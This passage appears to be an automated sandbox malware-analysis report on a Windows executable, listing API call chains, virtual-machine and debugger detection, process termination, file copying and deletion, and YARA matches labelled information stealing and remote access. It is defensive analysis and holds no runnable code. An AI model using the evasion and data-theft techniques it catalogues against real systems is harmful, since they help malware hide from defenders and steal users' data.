rocAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                    Source: kNp6KbvVoz.exeStatic PE information: section name: .pewume
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0042A378 push eax; retf 0_2_0042A39D
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048DB59C push ecx; ret 0_2_048DB5AF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_04949280 push ecx; ret 0_2_04949293
                    Source: kNp6KbvVoz.exeStatic PE information: section name: .text entropy: 7.843773564734436
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-44742
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI coverage: 9.5 %
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_048CE797
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_048CF087
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_048CC0A7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048CE177
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D4357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_048D4357
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D4DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048D4DC7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_048CDDE7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D3D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_048D3D67
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048C1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048C1977
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048CFA17
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D4A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_048D4A27
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00418060 GetSystemInfo,wsprintfA,0_2_00418060
                    Source: Amcache.hve.6.drBinary or memory string: VMware
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002F01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW s
                    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareR
                    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44727
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44730
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-45905
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44749
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44569
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44770
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44748
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeAPI call chain: ExitProcess graph end nodegraph_0-44741
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_02E39F83 push dword ptr fs:[00000030h]0_2_02E39F83
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048C0D90 mov eax, dword ptr fs:[00000030h]0_2_048C0D90
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D9D07 mov eax, dword ptr fs:[00000030h]0_2_048D9D07
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048C092B mov eax, dword ptr fs:[00000030h]0_2_048C092B
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048DD481 SetUnhandledExceptionFilter,0_2_048DD481
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048DB2BF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_048DB2BF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048DB8A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_048DB8A1
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: kNp6KbvVoz.exe PID: 6920, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D99F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_048D99F7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D9B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_048D9B47
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_049069EF cpuid 0_2_049069EF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_048D7F87
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
                    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.kNp6KbvVoz.exe.49a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.kNp6KbvVoz.exe.49a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.48c0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.48c0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kNp6KbvVoz.exe PID: 6920, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.kNp6KbvVoz.exe.49a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.kNp6KbvVoz.exe.49a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.kNp6KbvVoz.exe.48c0e67.2.raw.unpack, type: UNPACKEDPE
